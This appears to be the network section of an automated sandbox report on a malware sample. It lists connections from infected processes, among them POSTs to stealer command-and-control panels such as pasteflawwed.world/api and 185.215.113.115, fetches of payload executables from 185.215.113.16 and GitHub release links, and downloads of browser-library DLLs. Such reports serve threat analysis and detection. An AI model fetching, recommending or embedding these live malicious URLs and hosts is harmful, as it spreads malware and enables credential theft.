                                                                                            • 142.250.178.10:443
                                                                                              ogads-pa.googleapis.com
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              1.0kB
                                                                                               5.9kB
                                                                                               8
                                                                                              7
                                                                                            • 185.72.145.179:80
                                                                                              http://fivenn5sr.top/v1/upload.php
                                                                                              http
                                                                                              90ced29b15.exe
                                                                                              74.1kB
                                                                                               627 B
                                                                                               57
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST http://fivenn5sr.top/v1/upload.php

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              961 B
                                                                                               7.5kB
                                                                                               8
                                                                                              8
                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              961 B
                                                                                               7.5kB
                                                                                               8
                                                                                              8
                                                                                            • 104.21.86.17:443
                                                                                              https://pasteflawwed.world/api
                                                                                              tls, http
                                                                                              9aiiMOQ.exe
                                                                                              3.9kB
                                                                                               11.8kB
                                                                                               19
                                                                                              21

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.86.17:443
                                                                                              https://pasteflawwed.world/api
                                                                                              tls, http
                                                                                              9aiiMOQ.exe
                                                                                              2.2kB
                                                                                               4.9kB
                                                                                               10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.86.17:443
                                                                                              https://pasteflawwed.world/api
                                                                                              tls, http
                                                                                              9aiiMOQ.exe
                                                                                              1.2kB
                                                                                               4.8kB
                                                                                               9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 20.112.250.133:80
                                                                                              microsoft.com
                                                                                              powershell.exe
                                                                                              190 B
                                                                                               92 B
                                                                                               4
                                                                                              2
                                                                                            • 52.101.8.49:25
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              powershell.exe
                                                                                              260 B
                                                                                               5
                                                                                            • 127.0.0.1:9222
                                                                                              90ced29b15.exe
                                                                                            • 127.0.0.1:9223
                                                                                              7aencsM.exe
                                                                                            • 127.0.0.1:9223
                                                                                              7aencsM.exe
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              2.2kB
                                                                                               565 B
                                                                                               10
                                                                                              6

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.82.234.109:443
                                                                                              https://steamcommunity.com/profiles/76561199822375128
                                                                                              tls, http
                                                                                              198cfc7201.exe
                                                                                              1.6kB
                                                                                               43.4kB
                                                                                               22
                                                                                              37

                                                                                              HTTP Request

                                                                                              GET https://steamcommunity.com/profiles/76561199822375128

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              226.8kB
                                                                                               3.9kB
                                                                                               170
                                                                                              90

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.63.231:443
                                                                                              https://bloodyeleftor.world/api
                                                                                              tls, http
                                                                                              198cfc7201.exe
                                                                                              3.9kB
                                                                                               11.7kB
                                                                                               19
                                                                                              20

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 2.59.161.190:443
                                                                                              vanaheim.cn
                                                                                              https
                                                                                              powershell.exe
                                                                                              401 B
                                                                                               582 B
                                                                                               6
                                                                                              6
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              57.8kB
                                                                                               928 B
                                                                                               50
                                                                                              15

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.63.231:443
                                                                                              https://bloodyeleftor.world/api
                                                                                              tls, http
                                                                                              198cfc7201.exe
                                                                                              2.2kB
                                                                                               4.9kB
                                                                                               10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              14.6kB
                                                                                               576.2kB
                                                                                               291
                                                                                              423
                                                                                            • 104.21.63.231:443
                                                                                              https://bloodyeleftor.world/api
                                                                                              tls, http
                                                                                              198cfc7201.exe
                                                                                              1.2kB
                                                                                               4.8kB
                                                                                               9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.4kB
                                                                                               991 B
                                                                                               13
                                                                                              16
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 104.21.86.17:443
                                                                                              https://pasteflawwed.world/api
                                                                                              tls, http
                                                                                              6ccbdd7074.exe
                                                                                              4.5kB
                                                                                               11.9kB
                                                                                               21
                                                                                              24

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 104.21.86.17:443
                                                                                              https://pasteflawwed.world/api
                                                                                              tls, http
                                                                                              6ccbdd7074.exe
                                                                                              2.2kB
                                                                                               4.9kB
                                                                                               10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.86.17:443
                                                                                              https://pasteflawwed.world/api
                                                                                              tls, http
                                                                                              6ccbdd7074.exe
                                                                                              1.2kB
                                                                                               4.8kB
                                                                                               9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 127.0.0.1:9222
                                                                                              90ced29b15.exe
                                                                                            • 185.215.113.115:80
                                                                                              http://185.215.113.115/68b591d6548ec281/sqlite3.dll
                                                                                              http
                                                                                              ee1401f004.exe
                                                                                              46.9kB
                                                                                               1.2MB
                                                                                               849
                                                                                              843

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/sqlite3.dll

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.147.125.145:425
                                                                                              powershell.exe
                                                                                              3.1kB
                                                                                               1.2kB
                                                                                               10
                                                                                              12
                                                                                            • 185.243.96.115:425
                                                                                              powershell.exe
                                                                                              51.5kB
                                                                                               9.8kB
                                                                                               82
                                                                                              74
                                                                                            • 185.147.125.146:425
                                                                                              powershell.exe
                                                                                              3.1kB
                                                                                               1.2kB
                                                                                               10
                                                                                              12
                                                                                            • 193.143.1.5:425
                                                                                              powershell.exe
                                                                                              3.1kB
                                                                                               1.2kB
                                                                                               10
                                                                                              12
                                                                                            • 185.147.125.147:425
                                                                                              powershell.exe
                                                                                              21.5kB
                                                                                               4.0kB
                                                                                               43
                                                                                              39
                                                                                            • 185.42.12.45:425
                                                                                              powershell.exe
                                                                                              3.1kB
                                                                                               1.2kB
                                                                                               10
                                                                                              12
                                                                                            • 185.7.214.51:425
                                                                                              powershell.exe
                                                                                              12.2kB
                                                                                               2.9kB
                                                                                               26
                                                                                              27
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                               2.8kB
                                                                                               6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                               2.8kB
                                                                                               6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                               2.8kB
                                                                                               6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                               2.8kB
                                                                                               6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                               2.8kB
                                                                                               6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                               2.8kB
                                                                                               6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                               2.8kB
                                                                                               6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.3kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 172.217.169.78:443
                                                                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              2.0kB
                                                                                               9.3kB
                                                                                               13
                                                                                              16

                                                                                              HTTP Request

                                                                                              GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               951 B
                                                                                               12
                                                                                              15
                                                                                            • 142.250.200.4:443
                                                                                              www.google.com
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              1.1kB
                                                                                               5.5kB
                                                                                               9
                                                                                              8
                                                                                            • 142.250.200.4:443
                                                                                              https://www.google.com/async/newtab_promos
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              3.0kB
                                                                                               45.2kB
                                                                                               40
                                                                                              46

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/async/ddljson?async=ntp:2

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/async/newtab_promos
                                                                                            • 142.250.200.4:443
                                                                                              www.google.com
                                                                                              tls
                                                                                              chrome.exe
                                                                                              1.0kB
                                                                                               4.6kB
                                                                                               9
                                                                                              7
                                                                                            • 142.250.178.10:443
                                                                                              ogads-pa.googleapis.com
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              953 B
                                                                                               5.9kB
                                                                                               8
                                                                                              7
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              943 B
                                                                                               7.5kB
                                                                                               8
                                                                                              8
                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              993 B
                                                                                               7.5kB
                                                                                               8
                                                                                              8
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.215.113.16:80
                                                                                              http://185.215.113.16/mine/random.exe
                                                                                              http
                                                                                              powershell.exe
                                                                                              43.5kB
                                                                                               2.2MB
                                                                                               816
                                                                                              1575

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.16/mine/random.exe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 67.195.204.73:25
                                                                                              mta6.am0.yahoodns.net
                                                                                              powershell.exe
                                                                                              260 B
                                                                                               5
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 142.250.179.238:443
                                                                                              https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                                                                                              tls, http2
                                                                                              firefox.exe
                                                                                              2.2kB
                                                                                               10.0kB
                                                                                               16
                                                                                              21

                                                                                              HTTP Request

                                                                                              GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                                                                                              HTTP Request

                                                                                              GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                                                                                            • 142.250.179.238:443
                                                                                              youtube.com
                                                                                              tls, http2
                                                                                              firefox.exe
                                                                                              1.4kB
                                                                                               7.6kB
                                                                                               11
                                                                                              10
                                                                                            • 216.58.213.14:443
                                                                                              www.youtube.com
                                                                                              tls, http2
                                                                                              firefox.exe
                                                                                              1.4kB
                                                                                               7.6kB
                                                                                               11
                                                                                              10
                                                                                            • 216.58.201.110:443
                                                                                              https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                                                                              tls, http2
                                                                                              firefox.exe
                                                                                              2.9kB
                                                                                               75.5kB
                                                                                               29
                                                                                              67

                                                                                              HTTP Request

                                                                                              GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                                                                            • 34.149.97.1:443
                                                                                              firefox-api-proxy.cdn.mozilla.net
                                                                                              tls, http2
                                                                                              firefox.exe
                                                                                              1.5kB
                                                                                               4.3kB
                                                                                               12
                                                                                              13
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 142.250.200.4:443
                                                                                              https://www.google.com/favicon.ico
                                                                                              tls, http2
                                                                                              firefox.exe
                                                                                              1.9kB
                                                                                               7.5kB
                                                                                               14
                                                                                              16

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/favicon.ico
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.215.113.209:80
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              http
                                                                                              futors.exe
                                                                                              3.0kB
                                                                                               3.8kB
                                                                                               24
                                                                                              14

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.209/Di0Her478/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.209/Di0Her478/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.209/Di0Her478/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.209/Di0Her478/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.209/Di0Her478/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.209/Di0Her478/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.209/Di0Her478/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.209/Di0Her478/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.209/Di0Her478/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.209/Di0Her478/index.php

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.215.113.115:80
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              http
                                                                                              ee1401f004.exe
                                                                                              841 B
                                                                                               415 B
                                                                                               6
                                                                                              5

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 127.0.0.1:59582
                                                                                              firefox.exe
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 127.0.0.1:59590
                                                                                              firefox.exe
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               951 B
                                                                                               12
                                                                                              15
                                                                                            • 127.0.0.1:9229
                                                                                              ee1401f004.exe
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 20.26.156.215:443
                                                                                              https://github.com/legendary99999/fdfsdfdssfd/releases/download/dfsdfsdfsdsf/fher.exe
                                                                                              tls, http
                                                                                              futors.exe
                                                                                              2.1kB
                                                                                               26.8kB
                                                                                               26
                                                                                              30

                                                                                              HTTP Request

                                                                                              GET https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exe

                                                                                              HTTP Response

                                                                                              302

                                                                                              HTTP Request

                                                                                              GET https://github.com/legendary99999/fdsfsdfdsfds/releases/download/dfsfdsfdsdsf/con12312211221.exe

                                                                                              HTTP Response

                                                                                              302

                                                                                              HTTP Request

                                                                                              GET https://github.com/legendary99999/saffsfsd/releases/download/dsffdssff/12321321.exe

                                                                                              HTTP Response

                                                                                              302

                                                                                              HTTP Request

                                                                                              GET https://github.com/legendary99999/fsdfdsfds/releases/download/sdffdsfsddfs/alex12112.exe

                                                                                              HTTP Response

                                                                                              302

                                                                                              HTTP Request

                                                                                              GET https://github.com/legendary99999/fdfsdfdssfd/releases/download/dfsdfsdfsdsf/fher.exe

                                                                                              HTTP Response

                                                                                              302
                                                                                            • 163.70.151.63:443
                                                                                              i.instagram.com
                                                                                              tls
                                                                                              powershell.exe
                                                                                              1.4kB
                                                                                               8.9kB
                                                                                               14
                                                                                              18
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.199.108.133:443
                                                                                              https://objects.githubusercontent.com/github-production-release-asset-2e65be/935547594/67a4ea0f-a626-4118-b393-80fb7fdc2175?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003444Z&X-Amz-Expires=300&X-Amz-Signature=6fba39a086068076713cfdf4ac9efbb211495ae5df743c851de203108f97e0f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dfher.exe&response-content-type=application%2Foctet-stream
                                                                                              tls, http
                                                                                              futors.exe
                                                                                              463.9kB
                                                                                               22.8MB
                                                                                               9668
                                                                                              16360

                                                                                              HTTP Request

                                                                                              GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/931090743/fe2351f3-d512-4704-a31e-e7267ddf3e14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003417Z&X-Amz-Expires=300&X-Amz-Signature=66a4490c649969e8e57e49179dcb3d281f5845caaa83cbf7476823ad7406f82a&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dtrano1221.exe&response-content-type=application%2Foctet-stream

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/932430920/f3727065-e97b-4230-9333-63b156bde389?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003427Z&X-Amz-Expires=300&X-Amz-Signature=d0a095dda97f3ae2552aa4991862c4e6a4469581f8b8e7c7c9530a03e2528eb7&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dcon12312211221.exe&response-content-type=application%2Foctet-stream

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/933717859/3158e964-6e73-4443-84f8-ddb304d57b87?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003435Z&X-Amz-Expires=300&X-Amz-Signature=f77e2f934b6db0dcdfdf9419e052f8c8ed4bdaf93aca348f73976eb1a93e252c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D12321321.exe&response-content-type=application%2Foctet-stream

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/933910050/851ed480-459a-4e09-83d2-9ce8a09d0744?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003440Z&X-Amz-Expires=300&X-Amz-Signature=df4602c7473369f1ea873854603106cdd7f289af4ae5957ac9d4b2cef6079407&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex12112.exe&response-content-type=application%2Foctet-stream

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/935547594/67a4ea0f-a626-4118-b393-80fb7fdc2175?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003444Z&X-Amz-Expires=300&X-Amz-Signature=6fba39a086068076713cfdf4ac9efbb211495ae5df743c851de203108f97e0f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dfher.exe&response-content-type=application%2Foctet-stream

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.0kB
                                                                                               911 B
                                                                                               10
                                                                                              14
                                                                                            • 127.0.0.1:9222
                                                                                              90ced29b15.exe
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.0kB
                                                                                               911 B
                                                                                               10
                                                                                              14
                                                                                            • 20.42.73.29:443
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              tls, http
                                                                                              msedge.exe
                                                                                              37.6kB
                                                                                               13.5kB
                                                                                               49
                                                                                              28

                                                                                              HTTP Request

                                                                                              POST https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.0kB
                                                                                               911 B
                                                                                               10
                                                                                              14
                                                                                            • 185.7.214.51:425
                                                                                              powershell.exe
                                                                                              260 B
                                                                                               200 B
                                                                                               5
                                                                                              5
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.3kB
                                                                                               1.2kB
                                                                                               13
                                                                                              15
                                                                                            • 185.215.113.115:80
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              http
                                                                                              ee1401f004.exe
                                                                                              77.7kB
                                                                                               4.3MB
                                                                                               1451
                                                                                              3088

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/freebl3.dll

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/mozglue.dll

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/msvcp140.dll

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/nss3.dll

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/softokn3.dll

                                                                                              HTTP Response

                                                                                              200

